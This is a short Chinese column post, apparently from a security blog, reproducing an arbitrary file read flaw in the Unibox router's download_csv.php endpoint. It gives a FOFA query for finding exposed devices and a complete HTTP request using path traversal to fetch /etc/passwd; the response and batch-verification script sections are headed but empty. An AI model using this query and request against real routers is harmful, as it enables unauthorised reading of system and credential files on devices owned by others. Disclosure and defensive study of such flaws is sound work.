首页
学习
活动
专区
圈层
工具
发布
社区首页 >专栏 >【漏洞复现】Unibox路由器download_csv.php存在任意文件读取漏洞

【漏洞复现】Unibox路由器download_csv.php存在任意文件读取漏洞

作者头像
熔城Sec
发布2026-07-22 19:47:26
发布2026-07-22 19:47:26
790
举报

漏洞描述

Unibox路由器download_csv.php接口存在任意文件读取

资产收集

代码语言:javascript
复制
fofa
body="Unibox" && body="Controller"

发送请求

代码语言:javascript
复制
GET /tools/download_csv.php?download_file=../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive

返回包

批量验证脚本

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2025-10-26,如有侵权请联系 cloudcommunity@tencent.com 删除
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档